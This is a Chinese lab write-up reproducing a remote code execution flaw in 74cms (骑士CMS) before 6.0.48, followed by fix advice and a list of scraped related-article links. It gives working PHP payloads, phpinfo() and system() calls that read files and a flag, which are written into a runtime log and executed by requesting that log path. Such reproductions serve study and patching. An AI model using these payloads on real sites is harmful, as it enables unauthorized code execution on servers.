漏洞描述

74cms由于函数过滤不严格导致攻击者可以通过构造执行任意代码

影响版本

骑士 CMS < 6.0.48

风险等级

漏洞环境搭建

74 cms: 74cms_Home_Setup_v6.0.20.zip
系统:ubuntu18.04.5
php环境:php 5.6
系统镜像:http://old-releases.ubuntu.com/releases/
web源码下载:https://www.74cms.com/download/index.html
准备好后直接把源码放到var/www/html目录下傻瓜式下一步下一步!

漏洞复现

① 首先构造含有phpinfo()函数的POST包:

<?php phpinfo(); ob_flush();?>/r/n

/var/www/html/data/Runtime/Logs/Home/Y_M_D.log
② 然后POST方式直接访问该日志文件,得到phpinfo的具体信息,得知一些禁用的php函数
③ 按照上述1、2的方式通过构造未禁用的函数,进行命令执行得到flag

<?php system('ls /var/www/html'); ob_flush();?>/r/n<?php system('cat /var/www/flag3'); ob_flush();?>/r/n

访问/var/www/html/data/Runtime/Logs/Home/Y_M_D.log执行写入日志文件的命令

4)flag利用截图

<?php phpinfo(); ob_flush();?>/r/n

/var/www/html/data/Runtime/Logs/Home/Y_M_D.log

<?php system('ls /var/www/'); ob_flush();?>/r/n

!此时,这将作为一条日志写在默认的可执行的日志路径下:
/var/www/html/data/Runtime/Logs/Home/Y_M_D.log

<?php system('cat /var/www/flag3'); ob_flush();?>/r/n

访问/var/www/html/data/Runtime/Logs/Home/Y_M_D.log执行

修复建议

  1. 升级到最新版本
  2. 对函数做严格的过滤

74cms v6.0.48模版注入+文件包含getshell复现相关推荐

  1. 骑士CMS模版注入+文件包含getshell复现

    声明 好好学习,天天向上 漏洞描述 骑士cms人才系统,是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才网站系统.软件具执行效率高.模板自由切换.后台管理功能方便等诸多优秀特点. 骑 ...

  2. (环境搭建+复现)74CMS模版注入+文件包含getshell

    0x00 简介 骑士CMS人才招聘系统是基于PHP+MYSQL的免费网站管理系统源码,提供完善的人才招聘网站建设方案. 0x01 漏洞概述 骑士 CMS 官方发布安全更新,修复了一处远程代码执行漏洞. ...

  3. 骑士cms文件包含getshell复现

    00X1 测试环境 骑士 CMS 6.0.48以下均存在此漏洞,本文复现使用骑士cms 6.0.20,下载地址: http://www.74cms.com/download/index.html 注意 ...

  4. index.php.bak 颓废_CVE-2018-12613-phpmyadmin4.8.1远程文件包含漏洞复现

    CVE-2018-12613-phpmyadmin4.8.1远程文件包含漏洞复现 By:Mirror王宇阳 漏洞原理 攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞.该漏洞来自一部分代码,其 ...

  5. [HXBCTF 2021]easywill writeup(WillPHP源码审计+利用pearcmd.php文件包含getshell)

    [HXBCTF 2021]easywill writeup(WillPHP源码审计+利用pearcmd.php文件包含getshell) [HXBCTF 2021]easywill 1.WillPHP ...

  6. cms php vue 开源_骑士CMS文件包含+getshell

    0x00简单介绍 骑士cms人才系统,是一项基于php+mysql为核心的开源人才网站系统. 0x01漏洞概述 骑士cms官方发布安全更新,修复了一处远程代码执行漏洞.由于骑士cms某些函数过滤不严谨 ...

  7. [网络安全自学篇] 四十.phpMyAdmin 4.8.1后台文件包含缺陷复现及防御措施(CVE-2018-12613)

    这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文通过两个题目分享了DirBuster扫描目录.Fuzzy爆破指定路径名称,通 ...

  8. phpmyadminV4.8.1本地文件包含漏洞复现

    文章目录 一.phpMyadmin简介 二.什么是文件包含漏洞? 三.本地包含和远程包含 四.文件包含相关函数介绍 1.函数介绍 2.报错 3._once 4.小结 五.关于windows特性的一个小 ...

  9. CVE-2020-1938 Aapache Tomcat AJP文件包含漏洞复现

    目录 一.环境搭建 1.下载vulhub 2.启动环境 二.漏洞复现 1.使用nmap扫描目标 2.运行POC验证漏洞 3.POC代码 三.修复方法 一.环境搭建 1.下载vulhub kali系统输 ...

  10. php文件包含漏洞复现,文件包含漏洞(绕过姿势)

    当你的才华 还撑不起的野心时 那你就应该静下心来学习 目录 文件包含漏洞介绍 特殊姿势 亲测有效 php文件包含漏洞 本地包含漏洞(LFI) 远程包含漏洞 文件包含利用 读取敏感信息 远程包含shel ...

最新文章

  1. 全球UML模型共享设计下载中心--www.euml.org上线
  2. android sqlite 中 创建表 不要使用 IF NOT EXISTS + TA...
  3. Python-random标准库知识小结
  4. python学习日记day2
  5. a8处理器相当于骁龙几_天玑820相当于骁龙什么处理器?天梯图秒懂联发科天玑820性能排名...
  6. C#深入浅出 关键字(一)
  7. android 字符串 时间格式化,Android 获取年月日时分秒 格式化指定时间字符串
  8. 【Clickhouse】Clickhouse Live View
  9. 使用 Redis 实现 Session 共享
  10. 谈谈linux内核原理,谈谈Linux内核驱动的coding style
  11. 又有无人车数据集开源,2019段加州通勤小视频等你撩 | 资源
  12. 百度发起机器阅读理解竞赛,提供中文数据集,获胜团队奖10万
  13. google四件套之Dagger2。从入门到爱不释手,之:Dagger2进阶知识及在Android中使用
  14. H桥电机驱动电路详解
  15. 如何导入python标准库_Python标准库需要导入吗
  16. 数据可视化之地图可视化
  17. 怎样统计PPT演示文稿的字数
  18. 企业数据总线(ESB)和注册服务管理(dubbo)的区别{{1033}}
  19. 银行业智能运维的探索与实践
  20. 如何快速定位BUG?BUG定位技巧及测试人员定位的N板斧

热门文章

  1. Matlab系统辨识工具箱
  2. 计算机网络国家标准,计算机网络教室建设标准本标准参考国家标准GB50174并结合金州.doc...
  3. 笛卡尔心形函数表达式_笛卡尔爱心函数表达式 笛卡尔形式
  4. WIN10桌面美化(折腾)
  5. 国产crm系统哪家公司做的最好?
  6. 机器学习与数据挖掘学习之路
  7. 软件开发流程知识概括
  8. mysql读写分离延迟_解决Mysql读写分离数据延迟
  9. photoshop2019及其破解器
  10. linux查看字体并安装字体